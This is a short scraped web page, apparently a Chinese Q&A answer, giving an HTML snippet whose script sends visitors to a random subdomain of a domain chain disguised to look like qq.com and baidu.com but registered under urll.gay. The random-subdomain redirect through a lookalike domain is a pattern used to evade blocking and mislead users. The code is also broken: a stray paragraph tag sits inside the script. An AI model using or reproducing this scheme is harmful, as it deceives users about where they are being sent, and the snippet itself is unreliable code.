随机跳转泛解析二级域名 *.tz.cp.game.feixingqi.qq.com.baidu.com.urll.gay
<!DOCTYPE html>
<html>
<head>
<script>
window.onload = function() {
var currentDomain = window.location.hostname;
var targetDomain = '32.cp.game.feixingqi.qq.com.baidu.com.urll.gay';
<p>if (currentDomain === targetDomain) {
var subdomain = Math.random().toString(36).substring(7);
var redirectURL = 'http://' + subdomain + '.tz.cp.game.feixingqi.qq.com.baidu.com.urll.gay';
window.location.href = redirectURL;
}
}
</script></p>
</head>
<body>
<!-- Your HTML content here -->
</body>
</html>
原文地址: https://www.cveoy.top/t/topic/qoub 著作权归作者所有。请勿转载和采集!